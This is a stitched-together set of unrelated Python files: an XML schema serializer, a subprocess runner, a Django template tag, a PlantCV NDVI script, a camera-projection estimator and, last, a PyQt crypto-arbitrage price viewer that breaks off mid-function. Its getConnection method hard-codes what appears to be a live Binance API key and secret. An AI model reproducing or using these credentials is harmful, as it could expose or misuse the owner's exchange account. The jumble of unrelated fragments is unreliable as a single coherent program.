            node.setAttribute("type", domain.type)
        if domain.data_type_id is not None:
            # BUGFIX: the original re-emitted "type" here (copy-paste);
            # emit the data type id under its own attribute name.
            node.setAttribute("data_type_id", domain.data_type_id)
        if domain.align is not None:
            node.setAttribute("align", domain.align)
        if domain.width is not None:
            node.setAttribute("width", domain.width)
        if domain.precision is not None:
            node.setAttribute("precision", domain.precision)
        # Boolean flags are collapsed into a single comma-separated "props" attr.
        props = []
        if domain.show_null:
            props.append("show_null")
        if domain.summable:
            props.append("summable")
        if domain.case_sensitive:
            props.append("case_sensitive")
        if domain.show_lead_nulls:
            props.append("show_lead_nulls")
        if domain.thousands_separator:
            props.append("thousands_separator")
        if props:
            node.setAttribute("props", ", ".join(props))
        if domain.char_length is not None:
            node.setAttribute("char_length", domain.char_length)
        if domain.length is not None:
            node.setAttribute("length", domain.length)
        if domain.scale is not None:
            node.setAttribute("scale", domain.scale)
        return node

    def _createTableNode(self, xml, table, node=None):
        """Serialise one table with its fields, constraints and indices."""
        if node is None:
            node = xml.createElement("table")
        if table.name is not None:
            node.setAttribute("name", table.name)
        if table.description is not None:
            node.setAttribute("description", table.description)
        props = []
        if table.add:
            props.append("add")
        if table.edit:
            props.append("edit")
        if table.delete:
            props.append("delete")
        if props:
            node.setAttribute("props", ", ".join(props))
        if table.ht_table_flags is not None:
            node.setAttribute("ht_table_flags", table.ht_table_flags)
        if table.access_level is not None:
            node.setAttribute("access_level", table.access_level)
        createField = functools.partial(self._createFieldNode, xml)
        for field in map(createField, table.fields):
            node.appendChild(field)
        createConstraint = functools.partial(self._createConstraintNode, xml)
        for constraint in map(createConstraint, table.constraints):
            node.appendChild(constraint)
        createIndex = functools.partial(self._createIndexNode, xml)
        for index in map(createIndex, table.indices):
            node.appendChild(index)
        return node

    def _createFieldNode(self, xml, field, node=None):
        """Serialise one table field into a ``<field>`` element."""
        if node is None:
            node = xml.createElement("field")
        if field.name is not None:
            node.setAttribute("name", field.name)
        if field.rname is not None:
            node.setAttribute("rname", field.rname)
        if field.domain is not None:
            # BUGFIX: the original tested ``str(field.domain) is not None``,
            # which is always true, so the object branch below was dead code.
            if isinstance(field.domain, str):
                # Domain referenced by name.
                node.setAttribute("domain", field.domain)
            elif field.domain.name:
                node.setAttribute("domain", field.domain.name)
            else:
                # Anonymous domain: inline its defining attributes.
                node.setAttribute("domain.char_length", field.domain.char_length)
                node.setAttribute("domain.precision", field.domain.precision)
                node.setAttribute("domain.scale", field.domain.scale)
                node.setAttribute("domain.type", field.domain.type)
        if field.description is not None:
            node.setAttribute("description", field.description)
        props = []
        if field.input:
            props.append("input")
        if field.edit:
            props.append("edit")
        if field.show_in_grid:
            props.append("show_in_grid")
        if field.show_in_details:
            props.append("show_in_details")
        if field.is_mean:
            props.append("is_mean")
        if field.autocalculated:
            props.append("autocalculated")
        if field.required:
            props.append("required")
        if props:
            node.setAttribute("props", ", ".join(props))
        return node

    def _createConstraintNode(self, xml, constraint):
        """Serialise one constraint into a ``<constraint>`` element."""
        node = xml.createElement("constraint")
        if constraint.name is not None:
            node.setAttribute("name", constraint.name)
        if constraint.kind is not None:
            node.setAttribute("kind", constraint.kind)
        if constraint.items is not None:
            if len(constraint.items) == 1:
                node.setAttribute("items", constraint.items[0])
            else:
                # TODO: multi-item constraints are still unhandled.
                pass
        if constraint.reference_type is not None:
            node.setAttribute("reference_type", constraint.reference_type)
        if constraint.reference is not None:
            node.setAttribute("reference", constraint.reference)
        if constraint.expression is not None:
            # BUGFIX: the original used an empty attribute name here.
            node.setAttribute("expression", constraint.expression)
        props = []
        if constraint.has_value_edit:
            props.append("has_value_edit")
        if constraint.cascading_delete:
            props.append("cascading_delete")
        if constraint.full_cascading_delete:
            props.append("full_cascading_delete")
        if props:
            node.setAttribute("props", ", ".join(props))
        return node

    def _createIndexNode(self, xml, index):
        """Serialise one index; a single-field index uses a ``field`` attribute.

        Raises:
            ValueError: if the index has no fields at all.
        """
        if not index.fields:
            raise ValueError("Index has no fields")
        node = xml.createElement("index")
        if len(index.fields) == 1:
            node.setAttribute("field", index.fields[0])
        else:
            # BUGFIX: the original called ``functools(...)``, a TypeError;
            # ``functools.partial`` was clearly intended.
            createItem = functools.partial(self._createItem, xml)
            for item in map(createItem, index.fields):
                node.appendChild(item)
        if index.name is not None:
            node.setAttribute("name", index.name)
        props = []
        if index.fulltext:
            props.append("fulltext")
        if index.uniqueness:
            props.append("uniqueness")
        if index.is_clustered:
            props.append("clustered")
        if props:
            node.setAttribute("props", ", ".join(props))
        return node

    def _createItem(self, xml, item):
        """Serialise one index member into an ``<item>`` element."""
        node = xml.createElement("item")
        node.setAttribute("name", item.name)
        # BUGFIX: the original stringified the *encoded bytes* which yields
        # "b'...'"; emit the plain textual value instead.
        node.setAttribute("position", str(item.position))
        if item.desc:
            # BUGFIX: setAttribute() requires a value; flag descending order
            # via "props", matching the flag convention used elsewhere here.
            # NOTE(review): confirm the exact attribute against the dbd schema.
            node.setAttribute("props", "desc")
        return node
# Read three integers and classify them: "soma" if one equals the sum of the
# other two, else "multi" if one equals the product of the other two, else
# report the parity of the total ("par" for even, "ímpar" for odd).
first = int(input())
second = int(input())
third = int(input())
if first + second == third or first + third == second or second + third == first:
    print('soma')
elif first * second == third or first * third == second or second * third == first:
    print('multi')
elif (first + second + third) % 2 == 0:
    print('par')
else:
    print('ímpar')
import subprocess
import threading
import time
class ShellRunnerTimeout(Exception):
    """Raised when a shell command is still running after its timeout."""

    def __init__(self, cmd):
        # Keep the joined command line for error reporting.
        self.cmd = ' '.join(cmd)
        # BUGFIX: initialise Exception so str(exc) carries a useful message
        # (previously str() of this exception was empty).
        super().__init__('command timed out: %s' % self.cmd)
class ShellRunnerFailed(Exception):
    """Raised when a shell command exits with a non-zero return code."""

    def __init__(self, cmd, retval):
        self.cmd = ' '.join(cmd)
        self.retval = retval
        # BUGFIX: initialise Exception so str(exc) carries a useful message.
        super().__init__('command failed with exit code %s: %s' % (retval, self.cmd))
class ShellRunner(object):
    """Run a shell command with a timeout, sending its output to a logfile."""

    def __init__(self, cmd, logfile):
        self.cmd = cmd          # argv list, passed straight to Popen (no shell)
        self.logfile = logfile  # open file object receiving stdout + stderr
        self.process = None

    def run(self, timeout):
        """Execute the command and return the unused portion of *timeout*.

        Raises:
            ShellRunnerTimeout: if the command is still alive after *timeout* s.
            ShellRunnerFailed: if the command exits with a non-zero status.
        """
        def target():
            self.process = subprocess.Popen(self.cmd, stdout=self.logfile, stderr=subprocess.STDOUT, close_fds=True)
            self.process.wait()
        start_time = time.time()
        thread = threading.Thread(target=target)
        thread.start()
        thread.join(timeout)
        if thread.is_alive():
            self.process.terminate()
            thread.join()
            raise ShellRunnerTimeout(self.cmd)
        # Resolved TODO: surface non-zero exit codes via ShellRunnerFailed
        # (the exception class existed but was never raised anywhere).
        retval = self.process.returncode
        if retval != 0:
            raise ShellRunnerFailed(self.cmd, retval)
        # Return the remaining time
        return timeout - (time.time() - start_time)
|
from django import template
from django.core.urlresolvers import reverse
from ..models import Appointment
# Template tag/filter registry for this module.
register = template.Library()
class ContinuationAppointmentAnchor(template.Node):
    """Return a reverse url anchor for a continuation appointment, or '' if it already exists."""

    def __init__(self, appointment, dashboard_type, extra_url_context):
        # Template variables are resolved against the context in render().
        self.unresolved_appointment = template.Variable(appointment)
        self.unresolved_dashboard_type = template.Variable(dashboard_type)
        self.unresolved_extra_url_context = template.Variable(extra_url_context)

    def render(self, context):
        """Render an <A> tag linking to the admin add-view for the next visit instance."""
        self.appointment = self.unresolved_appointment.resolve(context)
        self.dashboard_type = self.unresolved_dashboard_type.resolve(context)
        self.registered_subject = self.appointment.registered_subject
        self.extra_url_context = self.unresolved_extra_url_context
        if not self.extra_url_context:
            self.extra_url_context = ''
        # A continuation exists when visit_instance + 1 is already taken
        # for this registered subject.
        existing_instances = [
            int(appointment.visit_instance)
            for appointment in Appointment.objects.filter(
                registered_subject=self.appointment.registered_subject)]
        if (int(self.appointment.visit_instance) + 1) in existing_instances:
            anchor = ''
        else:
            view = 'admin:%s_%s_add' % (self.appointment._meta.app_label, self.appointment._meta.module_name)
            try:
                # TODO: resolve error when using extra_url_context...give back variable name ???
                # BUGFIX: the query string previously contained a mojibake
                # '®istered_subject' (an '&reg' HTML entity artifact).
                rev_url = '%s?next=dashboard_url&dashboard_type=%s&registered_subject=%s&visit_definition=%s&visit_instance=%s' % (reverse(view), self.dashboard_type, self.appointment.registered_subject.pk, self.appointment.visit_definition.pk, str(int(self.appointment.visit_instance) + 1))
                anchor = '<A href="%s">continuation</A>' % (rev_url)
            except Exception as err:
                # BUGFIX: was a bare ``except`` that discarded the original
                # error; chain it so the NoReverseMatch detail is preserved.
                raise TypeError('ContinuationAppointmentUrl Tag: NoReverseMatch while rendering reverse for %s. Is model registered in admin?' % (self.appointment._meta.module_name)) from err
        return anchor
@register.tag(name='continuation_appointment_anchor')
def continuation_appointment_anchor(parser, token):
    """Compilation function for renderer ContinuationAppointmentUrl"""
    bits = token.split_contents()
    # Expect the tag name plus exactly three arguments.
    if len(bits) != 4:
        raise template.TemplateSyntaxError("%r tag requires exactly 3 arguments" % token.contents.split()[0])
    tag_name, appointment, dashboard_type, extra_url_context = bits
    return ContinuationAppointmentAnchor(appointment, dashboard_type, extra_url_context)
@register.filter(name='appt_type')
def appt_type(value):
    """Filters appointment.appt_type."""
    # Map known appointment types to their short labels; anything else -> None.
    short_labels = {'clinic': 'Clin', 'telephone': 'Tele', 'home': 'Home'}
    return short_labels.get(value)
|
import json
data = None  # module-level placeholder; populated when a file is loaded
ROWLATITUDE = 7 # Column number that latitude value is located in
ROWLARVAE = 16  # Column number that larvae count is located in
debug_bool = True  # master switch for debug() output
#
# Algorithm:
# TODO: Put in algorithm steps
# TODO: Create adjacency matrix for weighted edges on the graph
#
#
def debug(s):
    """Print *s* only while the module-level ``debug_bool`` flag is on."""
    if debug_bool:
        print(s)
class Animal:
    """One observation record: where it was seen and how many larvae."""

    def __init__(self, latitude, larvae_amount):
        super().__init__()
        self.latitude = latitude
        # BUGFIX: the larvae count was stored only under the misleading
        # attribute ``name``; expose it under its real name while keeping the
        # old attribute as a backward-compatible alias.
        self.larvae_amount = larvae_amount
        self.name = larvae_amount
def data_partition_groups(fileName) -> None:
    ''' Partition the data from a JSON file into animal groups based on location.

    Reads rows from data['table']['rows'], groups consecutive rows sharing the
    first row's latitude, and calls correlate() each time a new location starts.
    NOTE(review): the annotation previously claimed ``-> dict`` but nothing is
    returned; the final group is never passed to correlate(); and the ``temp``
    counter deliberately stops processing after a few rows (test scaffolding).
    '''
    file = open(fileName)  # Open buffer
    data = json.load(file)
    species_location = []  # Temp list with all species in a location (unused so far)
    animal_group = []  # Group animals by their location
    latitude_temp = None
    first = data['table']['rows'][0]  # Temp set to first animal
    animal_group.append(Animal(latitude=first[ROWLATITUDE], larvae_amount=first[ROWLARVAE]) )
    temp = 0  # REMOVE: testing variable for now to only get 5 values
    length = len(data['table']['rows'])
    for i in range(1, length):
        position = data['table']['rows'][i]  # Add the animal at the current position
        animal_temp = Animal(latitude=position[ROWLATITUDE], larvae_amount=position[ROWLARVAE])
        debug(animal_temp.latitude)
        if(animal_group[0].latitude != animal_temp.latitude):  # Begin new animal group by location
            correlate(animal_group)  # Correlate the previous animal_group
            animal_group.clear()  # Clear the animal_group for species at new location
        animal_group.append(animal_temp)
        temp = temp + 1
        if temp > 5:
            break
    file.close()  # Close buffer
# TODO: Find out if this is necessary?
def init_hash_map(data):
    ''' Hash map for unique locations of species: sort records in place by latitude. '''
    data.sort(key=lambda record: record['latitude'])
# TODO: Implement C(n,2) correlations per array, update adjacency matrix
def correlate(list):
    """Stub: log the call only; pairwise correlation is not implemented yet."""
    # NOTE(review): the parameter shadows the builtin ``list``; rename when implementing.
    debug("Correlate called")
    temp = None
def main():
    """Run the pipeline on the 2015 observation data file."""
    data_partition_groups("2015_data.json")
# Call to main
main()
#I got this code working shortly after starting the project
#So it was developed for visible light photos with no filter
#Then I started fooling around with double thresholding for the mask
#Bandpass filter will severely affect thresholding
#Background subtraction might have to be substituted instead
from plantcv import plantcv as pcv
import cv2
import numpy as np
#Define options for plantCV
class options:
    """Bundle of PlantCV pipeline settings (stands in for parsed CLI args)."""

    def __init__(self):
        self.image = "RGB3.jpg"       # default input image name
        self.debug = "print"          # "print" writes debug images; "plot" shows them
        self.writeimg = False         # do not save result images
        self.result = "."             # where result output goes
        self.outdir = "/home/anorman/Documents/NikScripts/WorkingImages"
args = options()
pcv.params.debug = args.debug
# Reads in calibrated RGB and NIR images.
# NOTE(review): args.image ("RGB3.jpg") is never used; the filenames below
# are hard-coded — confirm which input is intended.
rgb_img,rgb_path,rgb_filename = pcv.readimage(filename="RGB2.jpeg")
NIR_img, NIR_path, NIR_filename = pcv.readimage(filename="NIR2.jpeg")
# Converts and slices image into green-magenta channel and blue-yellow channel
green_magenta_img = pcv.rgb2gray_lab(rgb_img= rgb_img, channel='a')
blue_yellow_img = pcv.rgb2gray_lab(rgb_img= rgb_img,channel='l')
# Thresholds both sliced photos, creating two binary masks of plant material
img_binary1 = pcv.threshold.binary(gray_img=green_magenta_img, threshold=125, max_value=250, object_type='dark')
img_binary2 = pcv.threshold.binary(gray_img=blue_yellow_img, threshold=142, max_value=250, object_type='dark')
# AND operator: combines the two masks, keeping only the pixels present in both
combined_thresh = pcv.logical_and(img_binary1, img_binary2)
# Fills small objects in mask
fill_image = pcv.fill(bin_img=combined_thresh, size=20)
# Dilates mask
dilated = pcv.dilate(gray_img=fill_image, ksize=2, i=1)
# Uses mask to identify objects
# NOTE(review): the second call overwrites the first result immediately —
# confirm whether both RGB and NIR object lists were meant to be kept.
id_objects, obj_hierarchy = pcv.find_objects(img=rgb_img, mask=dilated)
id_objects, obj_hierarchy = pcv.find_objects(img=NIR_img, mask=dilated)
# Crops photos using the same mask
cropped_rgb = pcv.apply_mask(img=rgb_img, mask=dilated,mask_color='black')
cropped_NIR = pcv.apply_mask(img=NIR_img, mask=dilated, mask_color='black')
# Numpy slicing: Blue -[:,:,0] Green-[:,:,1] Red-[:,:,2] to create individual color channel photos
cropped_red_rgb = cropped_rgb[:,:,2]
cropped_red_NIR = cropped_NIR[:,:,2]
# Initializes NDVI value matrix
NDVI_data = []
# Goes through each pixel of RGB and NIR photos and does the NDVI calculation
# (NIR - red) / (NIR + red) for each, appending values to a flat list.
for x in range(0,len(cropped_rgb)):
    for y in range(0,len(cropped_rgb[0])):
        p = float(cropped_red_NIR[x,y]) - float(cropped_red_rgb[x,y])
        q = float(cropped_red_NIR[x,y]) + float(cropped_red_rgb[x,y])
        # In case red and NIR are both 0 (0/0 division), sets NDVI value to the
        # sentinel -10 so masked-out pixels can be excluded later.
        if p == 0 and q == 0:
            NDVI_data.append(-10)
        else:
            NDVI_data.append(p/q)
# The NDVI list contains values ranging from -1 to 1 (plus sentinel -10 values).
# To create a greyscale photo out of this, we need to convert to a 0-255 scale.
# Initialize NDVI average variables and greyscale photo matrix
k = 0
NDVI_sum = 0
grey_NDVI = []
# Sifts through the NDVI data, skipping the -10 sentinels:
# sums data values, counts real pixels, and maps [-1, 1] -> [0, 255].
for i in range(0,len(NDVI_data)):
    if NDVI_data[i] != -10:
        k += 1
        NDVI_sum += NDVI_data[i]
        grey_NDVI.append(((NDVI_data[i])+1)*127.5)
    else:
        grey_NDVI.append(0)
# Calculates average NDVI using NDVI sum and pixel count
# NOTE(review): raises ZeroDivisionError if the mask removed every pixel.
NDVI_average = NDVI_sum/float(k)
print (NDVI_average)
# Reshapes greyscale NDVI photo into a real photo format
pseudocolor = np.reshape(grey_NDVI,(len(cropped_red_rgb),len(cropped_red_rgb[0])))
# Creates a pseudocolored photo of NDVI values
pcv.visualize.pseudocolor(pseudocolor, obj=None, mask=None, background="image", cmap='gist_rainbow', min_value=0, max_value=255,axes=True, colorbar=True, obj_padding=None)
|
import os
import sys
import json
# Make the sibling 'langeval' package importable regardless of the CWD.
sys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'langeval'))
from eval import LanguageEval
class LangEvaluator():
    """Scores caption predictions against per-uid reference sentences."""

    def __init__(self, dataset):
        self.langeval = LanguageEval()
        # Map each datum's uid to its reference sentences.
        self.uid2ref = {datum['uid']: datum['sents'] for datum in dataset.data}

    def evaluate(self, uid2pred):
        """Score all predictions at once with the full metric suite."""
        uids = list(uid2pred)
        preds = [uid2pred[uid] for uid in uids]
        gts = [self.uid2ref[uid] for uid in uids]
        return self.langeval.eval_whole(gts, preds, no_metrics={})

    def get_reward(self, uidXpred, metric="CIDEr"):
        """Score (uid, prediction) pairs individually under a single metric."""
        pairs = list(uidXpred)
        preds = [pred for _, pred in pairs]
        gts = [self.uid2ref[uid] for uid, _ in pairs]
        return self.langeval.eval_batch(gts, preds, metric)
|
import numpy as np
import os
def estimateProjectionMatrix(x, y, P, num) :
    """Estimate a 3x4 camera projection matrix with the DLT algorithm.

    Args:
        x, y: image coordinates of the projected points (length >= num).
        P: 4 x num array of homogeneous 3-D points, one point per column.
        num: number of correspondences to use (>= 6 for a unique solution).

    Returns:
        The 3x4 projection matrix, defined up to scale, taken from the
        right-singular vector belonging to the smallest singular value.
    """
    rows = []
    zero4 = np.zeros(4)
    for k in range(num) :
        Pk = P[:, k]
        # Each correspondence contributes two linear constraints on the 12
        # unknowns: p1.Pk - x*(p3.Pk) = 0 and p2.Pk - y*(p3.Pk) = 0.
        rows.append(np.hstack((Pk, zero4, (-x[k]) * Pk)))
        rows.append(np.hstack((zero4, Pk, (-y[k]) * Pk)))
    # Building a list and stacking once replaces the fragile
    # np.array_equal(Q, []) accumulation of the original.
    Q = np.vstack(rows)
    # Null vector of Q = last row of Vh (smallest singular value).
    _, _, Vh = np.linalg.svd(Q)
    return Vh[-1].reshape(3, 4)
if __name__ == "__main__" :
    # Read correspondence files and estimate a projection matrix per file.
    path = 'data/mydata/txt/datapoints/'
    i = 0
    for filename in os.listdir(path):
        file = open(path + filename, 'r')
        lines = file.readlines()
        # First line holds the number of correspondences in the file.
        p_num = int(lines.pop(0))
        x = []
        y = []
        p = np.array([])
        for j in range(p_num) :
            # Each line: image x, image y, then the 3-D point (mm -> m) + w.
            line = lines.pop(0)
            words = line.split()
            x.append(int(words[0]))
            y.append(int(words[1]))
            pt = np.array([float(words[2]) / 1000, float(words[3]) / 1000, float(words[4]) / 1000, float(words[5])])
            if np.array_equal(p, []) :
                p = pt
            else :
                p = np.vstack((p, pt))
        # Transpose so points are columns (4 x n), as the estimator expects.
        p = p.T
        file.close()
        pmat = estimateProjectionMatrix(x, y, p, p_num)
        # Sanity check: project the world origin and normalise by depth.
        pt = np.array([0, 0, 0, 1])
        res = pmat @ pt
        print(res)
        res /= res[2]
        print(res)
        # NOTE(review): exit() here means only the FIRST file is processed and
        # the commented-out writer below never runs — confirm this is intended.
        exit()
        # file = open(f"data/mydata/txt/000000{i:02d}.txt", 'w+')
        # file.write("CONTOUR\n")
        # for y in range(pmat.shape[0]) :
        #     for x in range(pmat.shape[1]) :
        #         file.write(str(pmat[y][x])); file.write(" ")
        #     file.write("\n")
        # i += 1
from django.utils.deprecation import MiddlewareMixin
class MyMiddleWare(MiddlewareMixin):
    """Request-logging middleware: prints the path of every incoming request."""
    def process_request(self,request):
        # Log only; implicitly returning None lets Django continue processing.
        print(request.path)
|
import os
import sys
from xcoin_api_client import *
from binance.client import Client
import pprint
import json
import urllib.request
from urllib.request import Request, urlopen
import threading
import datetime
import time
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5 import uic
ret = 0;  # scratch variable for API return values
# Query parameters for the Bithumb ticker API (all coins, priced in KRW).
bithumb_rgParams = {
	"order_currency" : "ALL",
	"payment_currency" : "KRW"
};
# Coin symbols as used on Bithumb.
coin = ["ETH", "EOS", "ETC", "LTC", "DASH", "XRP", "XMR", "QTUM", "ZEC"];
# Corresponding Binance market symbols (ETH is quoted in USDT, the rest in ETH).
coin_binance = ["ETHUSDT", "EOSETH", "ETCETH", "LTCETH", "DASHETH", "XRPETH", "XMRETH", "QTUMETH", "ZECETH"];
# Maps a Binance market symbol back to the plain coin symbol.
coin_map = {
	"ETHUSDT" : "ETH",
	"EOSETH" : "EOS",
	"ETCETH" : "ETC",
	"LTCETH" : "LTC",
	"DASHETH" : "DASH",
	"XRPETH" : "XRP",
	"XMRETH" : "XMR",
	"QTUMETH" : "QTUM",
	"ZECETH" : "ZEC"
};
class Exchange:
    """Snapshot of prices/holdings on two exchanges for arbitrage comparison.

    NOTE(review): infoA and infoB are CLASS-level dicts, shared across all
    instances — confirm per-instance state is not required.
    """
    infoA = {
        'Exchange'  : "----", # User Input Value
        'Cur_Price' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # Get price value from the server API
        'ETH_Ratio' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # ETH_Ratio["EOS"] = Cur_Price["ETH"] / Cur_Price["EOS"]
        'Coin_Cnt'  : { "ETH" : 1, "EOS" : 11806, "ETC" : 1000, "LTC" : 1000, "DASH" : 1000, "XRP" : 1000, "XMR" : 1000, "QTUM" : 1000, "ZEC" : 1000 }, # User Input Value
        'ETH_Cnt'   : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # ETH_Cnt["EOS"] = Coint_Cnt["EOS"] * (1/ETH_Ratio["EOS"])
        'Result_Cnt' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # Converted count after transfer: Result_Cnt["EOS"] = Dest(ETH_Ratio["EOS"]) * Dest(ETH_Cnt["EOS"])
        'Profit_Cnt' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # Profit/loss check: Profit_Cnt["EOS"] = Result_Cnt["EOS"] - Conie_Cnt["EOS"]
    };
    infoB = {
        'Exchange'  : "----", # User Input Value
        'Cur_Price' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # Get price value from the server API
        'ETH_Ratio' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # ETH_Ratio["EOS"] = Cur_Price["ETH"] / Cur_Price["EOS"]
        'Coin_Cnt'  : { "ETH" : 1, "EOS" : 11806, "ETC" : 1000, "LTC" : 1000, "DASH" : 1000, "XRP" : 1000, "XMR" : 1000, "QTUM" : 1000, "ZEC" : 1000 }, # User Input Value
        'ETH_Cnt'   : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # ETH_Cnt["EOS"] = Coint_Cnt["EOS"] * (1/ETH_Ratio["EOS"])
        'Result_Cnt' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # Converted count after transfer: Result_Cnt["EOS"] = Dest(ETH_Ratio["EOS"]) * Dest(ETH_Cnt["EOS"])
        'Profit_Cnt' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # Profit/loss check: Profit_Cnt["EOS"] = Result_Cnt["EOS"] - Conie_Cnt["EOS"]
    };
# Load the Qt Designer UI file; index 0 is the generated form class.
form_class = uic.loadUiType("./QtUI/Coin.ui")[0];
#class MyWindow(QMainWindow):
class MyWindow(QMainWindow, form_class) :
    """Main window: shows live Bithumb (infoA) / Binance (infoB) prices and the
    estimated coin count gained or lost by transferring coins between the two
    exchanges, refreshed by background timer threads."""
    def __init__(self):
        super().__init__();
        self.setWindowTitle("Coin Master");
        self.setupUi(self);
        self.exchg = Exchange();
        # Seed the editable per-coin count fields from the model defaults.
        self.myEOSCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["EOS"]));
        self.myLTCCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["LTC"]));
        self.myXMRCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["XMR"]));
        self.myXRPCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["XRP"]));
        self.myZECCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["ZEC"]));
        self.myQTUMCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["QTUM"]));
        self.myETCCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["ETC"]));
        self.myDASHCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["DASH"]));
        # Push user edits in the text fields back into the model.
        self.myEOSCnt.textChanged.connect(self.setMyEOSCnt);
        self.myLTCCnt.textChanged.connect(self.setMyLTCCnt);
        self.myXMRCnt.textChanged.connect(self.setMyXMRCnt);
        self.myXRPCnt.textChanged.connect(self.setMyXRPCnt);
        self.myZECCnt.textChanged.connect(self.setMyZECCnt);
        self.myQTUMCnt.textChanged.connect(self.setMyQTUMCnt);
        self.myETCCnt.textChanged.connect(self.setMyETCCnt);
        self.myDASHCnt.textChanged.connect(self.setMyDASHCnt);
        # Start the price-refresh and clock threads.
        self.coin_timer_start();
        self.get_curtime_start();
    def setMyEOSCnt(self):
        """Sync the EOS count field into the model (empty field falls back to 1)."""
        # NOTE(review): int(data) raises ValueError on non-numeric input — confirm a
        # validator is set on the field, or guard the conversion.
        data = self.myEOSCnt.text();
        if(data == ""):
            self.exchg.infoA["Coin_Cnt"]["EOS"] = 1;
        else:
            self.exchg.infoA["Coin_Cnt"]["EOS"] = int(data);
        print("setMyEOSCnt= ", self.myEOSCnt.text());
        pass
    def setMyLTCCnt(self):
        """Sync the LTC count field into the model (empty field falls back to 1)."""
        data = self.myLTCCnt.text();
        if(data == ""):
            self.exchg.infoA["Coin_Cnt"]["LTC"] = 1;
        else:
            self.exchg.infoA["Coin_Cnt"]["LTC"] = int(data);
        print("setMyLTCCnt= ", self.myLTCCnt.text());
        pass
    def setMyXMRCnt(self):
        """Sync the XMR count field into the model (empty field falls back to 1)."""
        data = self.myXMRCnt.text();
        if(data == ""):
            self.exchg.infoA["Coin_Cnt"]["XMR"] = 1;
        else:
            self.exchg.infoA["Coin_Cnt"]["XMR"] = int(data);
        print("setMyXMRCnt= ", self.myXMRCnt.text());
        pass
    def setMyXRPCnt(self):
        """Sync the XRP count field into the model (empty field falls back to 1)."""
        data = self.myXRPCnt.text();
        if(data == ""):
            self.exchg.infoA["Coin_Cnt"]["XRP"] = 1;
        else:
            self.exchg.infoA["Coin_Cnt"]["XRP"] = int(data);
        print("setMyXRPCnt= ", self.myXRPCnt.text());
        pass
    def setMyZECCnt(self):
        """Sync the ZEC count field into the model (empty field falls back to 1)."""
        data = self.myZECCnt.text();
        if(data == ""):
            self.exchg.infoA["Coin_Cnt"]["ZEC"] = 1;
        else:
            self.exchg.infoA["Coin_Cnt"]["ZEC"] = int(data);
        print("setMyZECCnt= ", self.myZECCnt.text());
        pass
    def setMyQTUMCnt(self):
        """Sync the QTUM count field into the model (empty field falls back to 1)."""
        data = self.myQTUMCnt.text();
        if(data == ""):
            self.exchg.infoA["Coin_Cnt"]["QTUM"] = 1;
        else:
            self.exchg.infoA["Coin_Cnt"]["QTUM"] = int(data);
        print("setMyQTUMCnt= ", self.myQTUMCnt.text());
        pass
    def setMyDASHCnt(self):
        """Sync the DASH count field into the model (empty field falls back to 1)."""
        data = self.myDASHCnt.text();
        if(data == ""):
            self.exchg.infoA["Coin_Cnt"]["DASH"] = 1;
        else:
            self.exchg.infoA["Coin_Cnt"]["DASH"] = int(data);
        print("setMyDASHCnt= ", self.myDASHCnt.text());
        pass
    def setMyETCCnt(self):
        """Sync the ETC count field into the model (empty field falls back to 1)."""
        data = self.myETCCnt.text();
        if(data == ""):
            self.exchg.infoA["Coin_Cnt"]["ETC"] = 1;
        else:
            self.exchg.infoA["Coin_Cnt"]["ETC"] = int(data);
        print("setMyETCCnt= ", self.myETCCnt.text());
        pass
    def getConnection(self, kindofexchange):
        """Return an API client for the named exchange ("Bithumb" or "Binance").

        NOTE(review): API credentials are hard-coded below — move them to a
        config file or environment variables before committing/publishing.
        Also note the unknown-exchange branch prints and implicitly returns None.
        """
        client = 0;
        if(kindofexchange == "Bithumb") :
            #print("\ngetConnection : Bithumb");
            api_key = "api_connect_key";
            api_secret = "api_secret_key";
            client = XCoinAPI(api_key, api_secret);
            return client;
        elif (kindofexchange == "Binance") :
            #print("\ngetConnection : Binance");
            api_key = "AD0eZpGTPLSsmmVKNaQfmcF84SeimFX884i5hkz4ESHse4IG93KVTmpN5Zn5Rw996";
            api_secret = "Ao1CShHsHxVzzPmGH1mxRrG9Pw4rcXoTKNM9sxG9KKMWDBe3yRNzArKFbOxYGPU7j";
            client = Client(api_key, api_secret)
            return client;
        else :
            print("getConnection : none");
    def getCryptoCurrencyPrice(self, connection, kindofexchange, kindofcoine):
        """Fetch a ticker for one coin from the given exchange connection.

        Returns the raw exchange response: Bithumb ticker dict or Binance
        order-book ticker dict; 0 for an unknown exchange name.
        """
        if(kindofexchange == "Bithumb") :
